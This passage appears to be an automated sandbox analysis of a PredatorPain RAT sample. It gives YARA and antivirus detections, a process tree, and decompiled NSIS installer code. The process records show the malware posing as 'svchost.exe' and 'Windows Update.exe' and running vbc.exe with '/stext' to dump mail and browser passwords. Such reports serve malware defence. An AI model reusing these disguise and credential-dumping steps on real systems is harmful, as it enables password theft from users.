                                                                    • Rule: PredatorPain, Description: unknown, Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: RAT_PredatorPain, Description: Detects PredatorPain RAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Arnim Rupp
                                                                    • Rule: JoeSecurity_PredatorPainRAT, Description: Yara detected PredatorPainRAT, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Joe Security
                                                                    • Rule: PredatorPain, Description: unknown, Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: dw20.exe PID: 6148 Parent PID: 4548

                                                                    General

                                                                    Start time:11:22:27
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dw20.exe -x -s 2200
                                                                    Imagebase:0x10000000
                                                                    File size:33936 bytes
                                                                    MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 6256 Parent PID: 4280

                                                                    General

                                                                    Start time:11:22:30
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                                                                    Imagebase:0xbc0000
                                                                    File size:57344 bytes
                                                                    MD5 hash:A273A781070D239BA99D3FD8EF341E6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Avira
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 71%, Metadefender, Browse
                                                                    • Detection: 86%, ReversingLabs
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: vbc.exe PID: 6280 Parent PID: 4548

                                                                    General

                                                                    Start time:11:22:30
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: vbc.exe PID: 6292 Parent PID: 4548

                                                                    General

                                                                    Start time:11:22:32
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 6440 Parent PID: 568

                                                                    General

                                                                    Start time:11:22:33
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                    Imagebase:0x7ff7488e0000
                                                                    File size:51288 bytes
                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: WerFault.exe PID: 6612 Parent PID: 6280

                                                                    General

                                                                    Start time:11:22:34
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6280 -s 176
                                                                    Imagebase:0xb20000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: WerFault.exe PID: 6624 Parent PID: 6292

                                                                    General

                                                                    Start time:11:22:35
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 176
                                                                    Imagebase:0xb20000
                                                                    File size:434592 bytes
                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: dw20.exe PID: 6724 Parent PID: 5204

                                                                    General

                                                                    Start time:11:22:36
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:dw20.exe -x -s 2324
                                                                    Imagebase:0x10000000
                                                                    File size:33936 bytes
                                                                    MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: svchost.exe PID: 6740 Parent PID: 3388

                                                                    General

                                                                    Start time:11:22:36
                                                                    Start date:06/09/2021
                                                                    Path:C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe'
                                                                    Imagebase:0x320000
                                                                    File size:57344 bytes
                                                                    MD5 hash:A273A781070D239BA99D3FD8EF341E6C
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Reputation:low

                                                                    Chronological Activities

                                                                    Analysis Process: vbc.exe PID: 6912 Parent PID: 5204

                                                                    General

                                                                    Start time:11:22:39
                                                                    Start date:06/09/2021
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                    Imagebase:0x400000
                                                                    File size:1171592 bytes
                                                                    MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000014.00000002.274318737.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >

                                                                      Analysis Process: aaVb1xEmrd.exe PID: 2432 Parent PID: 5472 aaVb1xEmrd.exeCOMMON

                                                                      Executed Functions

                                                                      Function 0040315D, Relevance: 75.5, APIs: 23, Strings: 20, Instructions: 282filestringcomCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 69%
                                                                      			_entry_() {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				CHAR* _v20;
				int _v24;
				char _v27;
				char _v28;
				char _v32;
				int _v36;
				struct _SHFILEINFOA _v388;
				intOrPtr _t52;
				CHAR* _t56;
				char* _t59;
				CHAR* _t61;
				void* _t65;
				intOrPtr _t67;
				signed int _t68;
				int _t71;
				int _t72;
				int _t76;
				char _t82;
				int _t83;
				void* _t100;
				void* _t110;
				char _t112;
				CHAR* _t118;
				int _t119;
				CHAR* _t120;
				int _t121;
				char* _t123;
				int _t125;
				char _t138;

				_v16 = 0;
				_v12 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v8 = 0;
				_v24 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x42f0d0 = _t52;
				SHGetFileInfoA(0x429440, 0,  &_v388, 0x160, 0); // executed
				E004059A4(0x42e820, "NSIS Error");
				_t56 = GetCommandLineA();
				_t123 = "\"C:\\Users\\hardz\\Desktop\\aaVb1xEmrd.exe\" ";
				E004059A4(_t123, _t56);
				 *0x42f020 = GetModuleHandleA(0);
				_t59 = _t123;
				if("\"C:\\Users\\hardz\\Desktop\\aaVb1xEmrd.exe\" " == 0x22) {
					_v24 = 0x22;
					_t59 =  &M00435001;
				}
				_t61 = CharNextA(E004054C8(_t59, _v24));
				_v20 = _t61;
				while(1) {
					_t112 =  *_t61;
					_t128 = _t112;
					if(_t112 == 0) {
						break;
					}
					__eflags = _t112 - 0x20;
					if(_t112 != 0x20) {
						L5:
						__eflags =  *_t61 - 0x22;
						_v24 = 0x20;
						if( *_t61 == 0x22) {
							_t61 =  &(_t61[1]);
							__eflags = _t61;
							_v24 = 0x22;
						}
						__eflags =  *_t61 - 0x2f;
						if( *_t61 != 0x2f) {
							L15:
							_t61 = E004054C8(_t61, _v24);
							__eflags =  *_t61 - 0x22;
							if(__eflags == 0) {
								_t61 =  &(_t61[1]);
								__eflags = _t61;
							}
							continue;
						} else {
							_t61 =  &(_t61[1]);
							__eflags =  *_t61 - 0x53;
							if( *_t61 == 0x53) {
								__eflags = (_t61[1] | 0x00000020) - 0x20;
								if((_t61[1] | 0x00000020) == 0x20) {
									_t12 =  &_v8;
									 *_t12 = _v8 | 0x00000002;
									__eflags =  *_t12;
								}
							}
							__eflags =  *_t61 - 0x4352434e;
							if( *_t61 == 0x4352434e) {
								__eflags = (_t61[4] | 0x00000020) - 0x20;
								if((_t61[4] | 0x00000020) == 0x20) {
									_t15 =  &_v8;
									 *_t15 = _v8 | 0x00000004;
									__eflags =  *_t15;
								}
							}
							__eflags =  *((intOrPtr*)(_t61 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t61 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t61 - 2)) = 0;
								__eflags =  &(_t61[2]);
								E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp",  &(_t61[2]));
								L20:
								_t118 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t118);
								_t65 = E00403129(_t128);
								_t129 = _t65;
								if(_t65 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t67 = E00402C3A(_t130, _v8); // executed
									_v12 = _t67;
									if(_t67 != 0) {
										L32:
										ExitProcess(); // executed
										__imp__OleUninitialize(); // executed
										if(_v12 == 0) {
											__eflags =  *0x42f0b4;
											if( *0x42f0b4 != 0) {
												_v8 = E00405CAA("ADVAPI32.dll", "OpenProcessToken");
												_t119 = E00405CAA("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t71 = E00405CAA("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _v8;
												_t125 = _t71;
												if(_v8 != 0) {
													__eflags = _t119;
													if(_t119 != 0) {
														__eflags = _t125;
														if(_t125 != 0) {
															_t76 = _v8(GetCurrentProcess(), 0x28,  &_v20);
															__eflags = _t76;
															if(_t76 != 0) {
																 *_t119(0, "SeShutdownPrivilege",  &_v32);
																_v36 = 1;
																_v24 = 2;
																 *_t125(_v20, 0,  &_v36, 0, 0, 0);
															}
														}
													}
												}
												_t72 = ExitWindowsEx(2, 0);
												__eflags = _t72;
												if(_t72 == 0) {
													E00401410(9);
												}
											}
											_t68 =  *0x42f0cc;
											__eflags = _t68 - 0xffffffff;
											if(_t68 != 0xffffffff) {
												_v16 = _t68;
											}
											ExitProcess(_v16);
										}
										E0040529A(_v12, 0x200010);
										ExitProcess(2);
									}
									if( *0x42f034 == 0) {
										L31:
										 *0x42f0cc =  *0x42f0cc | 0xffffffff;
										_v16 = E0040352E();
										goto L32;
									}
									_t121 = E004054C8(_t123, 0);
									while(_t121 >= _t123) {
										__eflags =  *_t121 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t121 = _t121 - 1;
										__eflags = _t121;
									}
									_t134 = _t121 - _t123;
									_v12 = "Error launching installer";
									if(_t121 < _t123) {
										_t82 = "Au_.exe"; // 0x2e5f7541
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
										_v28 = _t82;
										_t83 =  *0x409218; // 0x657865
										_v24 = _t83;
										lstrcatA(_t120, "~nsu.tmp");
										CreateDirectoryA(_t120, 0);
										_t138 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t138 == 0) {
											E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
										}
										E004059A4(0x430000, _v20);
										E004059A4(0x430400,  &_v28);
										_v8 = 0;
										do {
											_push( *((intOrPtr*)( *0x42f028 + 0x120)));
											_push(0x428c40);
											E004059C6(0, _t120, 0x428c40);
											DeleteFileA(0x428c40);
											if(_v12 == 0) {
												goto L42;
											}
											if(lstrcmpiA(GetModuleFileNameA(0, 0x429040, 0x400) + 0x42903a,  &_v27) == 0) {
												goto L32;
											}
											if(CopyFileA(0x429040, 0x428c40, 1) != 0) {
												_push(0);
												_push(0x428c40);
												E004056F7();
												_push(0);
												_push(_t120);
												E004056F7();
												_push( *((intOrPtr*)( *0x42f028 + 0x124)));
												_push(0x428c40);
												E004059C6(0, _t120, 0x428c40);
												_t100 = E00405222(0x428c40, _t120);
												if(_t100 != 0) {
													CloseHandle(_t100);
													_v12 = 0;
												}
											}
											L42:
											 *0x430400 =  *0x430400 + 1;
											_v8 = _v8 + 1;
										} while (_v8 < 0x1a);
										goto L32;
									}
									 *_t121 = 0;
									_t122 = _t121 + 4;
									if(E0040557D(_t134, _t121 + 4) == 0) {
										goto L32;
									}
									E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t122);
									E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t122);
									_v12 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t118, 0x3fb);
								lstrcatA(_t118, "\\Temp");
								_t110 = E00403129(_t129);
								_t130 = _t110;
								if(_t110 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t61 =  &(_t61[1]);
						__eflags =  *_t61 - 0x20;
					} while ( *_t61 == 0x20);
					goto L5;
				}
				goto L20;
			}



































                                                                      0x0040316b
                                                                      0x0040316e
                                                                      0x00403175
                                                                      0x00403178
                                                                      0x0040317c
                                                                      0x00403183
                                                                      0x00403189
                                                                      0x004031a1
                                                                      0x004031b1
                                                                      0x004031b6
                                                                      0x004031bc
                                                                      0x004031c3
                                                                      0x004031d6
                                                                      0x004031db
                                                                      0x004031dd
                                                                      0x004031df
                                                                      0x004031e3
                                                                      0x004031e3
                                                                      0x004031f2
                                                                      0x004031f8
                                                                      0x0040325f
                                                                      0x0040325f
                                                                      0x00403261
                                                                      0x00403263
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004031fd
                                                                      0x00403200
                                                                      0x00403208
                                                                      0x00403208
                                                                      0x0040320b
                                                                      0x0040320f
                                                                      0x00403211
                                                                      0x00403211
                                                                      0x00403212
                                                                      0x00403212
                                                                      0x00403216
                                                                      0x00403219
                                                                      0x00403250
                                                                      0x00403254
                                                                      0x00403259
                                                                      0x0040325c
                                                                      0x0040325e
                                                                      0x0040325e
                                                                      0x0040325e
                                                                      0x00000000
                                                                      0x0040321b
                                                                      0x0040321b
                                                                      0x0040321c
                                                                      0x0040321f
                                                                      0x00403227
                                                                      0x0040322a
                                                                      0x0040322c
                                                                      0x0040322c
                                                                      0x0040322c
                                                                      0x0040322c
                                                                      0x0040322a
                                                                      0x00403230
                                                                      0x00403236
                                                                      0x0040323e
                                                                      0x00403241
                                                                      0x00403243
                                                                      0x00403243
                                                                      0x00403243
                                                                      0x00403243
                                                                      0x00403241
                                                                      0x00403247
                                                                      0x0040324e
                                                                      0x00403267
                                                                      0x0040326a
                                                                      0x00403273
                                                                      0x00403278
                                                                      0x00403278
                                                                      0x00403283
                                                                      0x00403289
                                                                      0x0040328e
                                                                      0x00403290
                                                                      0x004032b2
                                                                      0x004032b7
                                                                      0x004032c0
                                                                      0x004032c7
                                                                      0x004032ca
                                                                      0x0040332e
                                                                      0x0040332e
                                                                      0x00403333
                                                                      0x0040333c
                                                                      0x0040345e
                                                                      0x00403464
                                                                      0x00403480
                                                                      0x0040348e
                                                                      0x00403490
                                                                      0x00403495
                                                                      0x00403498
                                                                      0x0040349a
                                                                      0x0040349c
                                                                      0x0040349e
                                                                      0x004034a0
                                                                      0x004034a2
                                                                      0x004034b1
                                                                      0x004034b4
                                                                      0x004034b6
                                                                      0x004034c2
                                                                      0x004034cf
                                                                      0x004034d6
                                                                      0x004034dd
                                                                      0x004034dd
                                                                      0x004034b6
                                                                      0x004034a2
                                                                      0x0040349e
                                                                      0x004034e2
                                                                      0x004034e8
                                                                      0x004034ea
                                                                      0x004034ee
                                                                      0x004034ee
                                                                      0x004034ea
                                                                      0x004034f3
                                                                      0x004034f8
                                                                      0x004034fb
                                                                      0x004034fd
                                                                      0x004034fd
                                                                      0x00403503
                                                                      0x00403503
                                                                      0x0040334a
                                                                      0x00403351
                                                                      0x00403351
                                                                      0x004032d2
                                                                      0x0040331f
                                                                      0x0040331f
                                                                      0x0040332b
                                                                      0x00000000
                                                                      0x0040332b
                                                                      0x004032db
                                                                      0x004032e8
                                                                      0x004032df
                                                                      0x004032e5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004032e7
                                                                      0x004032e7
                                                                      0x004032e7
                                                                      0x004032ec
                                                                      0x004032ee
                                                                      0x004032f5
                                                                      0x00403357
                                                                      0x0040335c
                                                                      0x00403361
                                                                      0x00403364
                                                                      0x0040336f
                                                                      0x00403372
                                                                      0x00403379
                                                                      0x0040337f
                                                                      0x00403385
                                                                      0x00403391
                                                                      0x00403391
                                                                      0x0040339e
                                                                      0x004033ac
                                                                      0x004033b1
                                                                      0x004033b9
                                                                      0x004033be
                                                                      0x004033c4
                                                                      0x004033c5
                                                                      0x004033cb
                                                                      0x004033d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004033fa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403410
                                                                      0x00403412
                                                                      0x00403413
                                                                      0x00403414
                                                                      0x00403419
                                                                      0x0040341a
                                                                      0x0040341b
                                                                      0x00403425
                                                                      0x0040342b
                                                                      0x0040342c
                                                                      0x00403433
                                                                      0x0040343a
                                                                      0x0040343d
                                                                      0x00403443
                                                                      0x00403443
                                                                      0x0040343a
                                                                      0x00403446
                                                                      0x00403446
                                                                      0x0040344c
                                                                      0x0040344f
                                                                      0x00000000
                                                                      0x00403459
                                                                      0x004032f7
                                                                      0x004032f9
                                                                      0x00403304
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040330c
                                                                      0x00403317
                                                                      0x0040331c
                                                                      0x00000000
                                                                      0x0040331c
                                                                      0x00403298
                                                                      0x004032a4
                                                                      0x004032a9
                                                                      0x004032ae
                                                                      0x004032b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004032b0
                                                                      0x00000000
                                                                      0x0040324e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403202
                                                                      0x00403202
                                                                      0x00403202
                                                                      0x00403203
                                                                      0x00403203
                                                                      0x00000000
                                                                      0x00403202
                                                                      0x00000000

                                                                      APIs
                                                                      • #17.COMCTL32 ref: 0040317C
                                                                      • OleInitialize.OLE32(00000000), ref: 00403183
                                                                      • SHGetFileInfoA.SHELL32(00429440,00000000,?,00000160,00000000), ref: 004031A1
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      • GetCommandLineA.KERNEL32(0042E820,NSIS Error), ref: 004031B6
                                                                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004031C9
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000020), ref: 004031F2
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403283
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403298
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032A4
                                                                      • DeleteFileA.KERNELBASE(1033), ref: 004032B7
                                                                      • ExitProcess.KERNEL32(?), ref: 0040332E
                                                                      • OleUninitialize.OLE32(?), ref: 00403333
                                                                      • ExitProcess.KERNEL32 ref: 00403351
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000,?), ref: 00403372
                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000,?), ref: 00403379
                                                                      • DeleteFileA.KERNEL32(00428C40,00428C40,?,00430400,?,00430000,?), ref: 004033CB
                                                                      • GetModuleFileNameA.KERNEL32(00000000,00429040,00000400), ref: 004033E1
                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 004033F2
                                                                      • CopyFileA.KERNEL32(00429040,00428C40,00000001), ref: 00403408
                                                                      • CloseHandle.KERNEL32(00000000,00428C40,C:\Users\user\AppData\Local\Temp\,00428C40,?,C:\Users\user\AppData\Local\Temp\,00000000,00428C40,00000000), ref: 0040343D
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 004034AA
                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 004034E2
                                                                      • ExitProcess.KERNEL32 ref: 00403503
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: File$ExitProcess$DeleteDirectoryHandleModuleWindowslstrcat$CharCloseCommandCopyCreateCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\aaVb1xEmrd.exe" $1033$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                      • API String ID: 4176089003-72506846
                                                                      • Opcode ID: 4d6744f3ce6c7f3ed4729e5111d50859de650be46e9e489b668c6c702f79bd3f
                                                                      • Instruction ID: f60237c2c2551a273f7310616d20ac7be133654c6b16f68466d4dbf6d89f6539
                                                                      • Opcode Fuzzy Hash: 4d6744f3ce6c7f3ed4729e5111d50859de650be46e9e489b668c6c702f79bd3f
                                                                      • Instruction Fuzzy Hash: 28A19070904245BEDB21AFA19D4ABAF7EBCAB05309F5440BBF101B61D2C77C5A418B2E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040352E, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 215stringregistrylibraryCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E0040352E() {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t20;
				void* _t28;
				void* _t30;
				int _t31;
				void* _t34;
				struct HINSTANCE__* _t37;
				int _t38;
				int _t42;
				char _t61;
				CHAR* _t63;
				signed char _t67;
				CHAR* _t78;
				intOrPtr _t80;
				CHAR* _t82;
				CHAR* _t84;
				CHAR* _t85;

				_t80 =  *0x42f028;
				_t20 = E00405CAA("KERNEL32.dll", "GetUserDefaultUILanguage");
				_t88 = _t20;
				if(_t20 == 0) {
					_t78 = 0x42a488;
					"1033" = 0x7830;
					E00405898(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a488);
					__eflags =  *0x42a488;
					if(__eflags == 0) {
						E00405898(0x80000003, ".DEFAULT\\Control Panel\\International",  &M004072E2, 0x42a488);
					}
					lstrcatA("1033", _t78);
				} else {
					E00405902("1033",  *_t20() & 0x0000ffff);
				}
				E004037FA(_t75, _t88);
				_t84 = "C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42f0a0 =  *0x42f030 & 0x00000020;
				if(E0040557D(_t88, _t84) != 0) {
					L16:
					if(E0040557D(_t96, _t84) == 0) {
						_push( *((intOrPtr*)(_t80 + 0x118)));
						_push(_t84);
						E004059C6(0, _t78, _t80);
					}
					_t28 = LoadImageA( *0x42f020, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x42e808 = _t28;
					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
						L21:
						if(E00401410(0) == 0) {
							_t30 = E004037FA(_t75, __eflags);
							__eflags =  *0x42f0c0;
							if( *0x42f0c0 != 0) {
								_t31 = E00404E3B(_t30, 0);
								__eflags = _t31;
								if(_t31 == 0) {
									E00401410(1);
									goto L33;
								}
								__eflags =  *0x42e7ec;
								if( *0x42e7ec == 0) {
									E00401410(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a460, 5);
							_t85 = "RichEd20.dll";
							_t37 = LoadLibraryA(_t85);
							__eflags = _t37;
							if(_t37 == 0) {
								M004092A2 = 0x3233;
								LoadLibraryA(_t85);
							}
							_t82 = "RichEdit20A";
							_t38 = GetClassInfoA(0, _t82, 0x42e7c0);
							__eflags = _t38;
							if(_t38 == 0) {
								 *0x409298 = 0;
								GetClassInfoA(0, _t82, 0x42e7c0);
								 *0x42e7e4 = _t82;
								 *0x409298 = 0x32;
								RegisterClassA(0x42e7c0);
							}
							_t42 = DialogBoxParamA( *0x42f020,  *0x42e800 + 0x00000069 & 0x0000ffff, 0, E004038C7, 0);
							E00401410(5);
							return _t42;
						}
						L22:
						_t34 = 2;
						return _t34;
					} else {
						_t75 =  *0x42f020;
						 *0x42e7d4 = _t28;
						_v20 = 0x624e5f;
						 *0x42e7c4 = E00401000;
						 *0x42e7d0 =  *0x42f020;
						 *0x42e7e4 =  &_v20;
						if(RegisterClassA(0x42e7c0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						_t12 =  &_v16; // 0x624e5f
						SystemParametersInfoA(0x30, 0, _t12, 0);
						 *0x42a460 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f020, 0);
						goto L21;
					}
				} else {
					_t75 =  *(_t80 + 0x48);
					if(_t75 == 0) {
						goto L16;
					}
					_t78 = 0x42dfc0;
					E00405898( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x42f058, 0x42dfc0);
					_t61 =  *0x42dfc0; // 0x0
					if(_t61 == 0) {
						goto L16;
					}
					if(_t61 == 0x22) {
						_t78 = 0x42dfc1;
						 *((char*)(E004054C8(0x42dfc1, 0x22))) = 0;
					}
					_t63 = lstrlenA(_t78) + _t78 - 4;
					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
						L15:
						E004059A4(_t84, E0040549D(_t78));
						goto L16;
					} else {
						_t67 = GetFileAttributesA(_t78);
						if(_t67 == 0xffffffff) {
							L14:
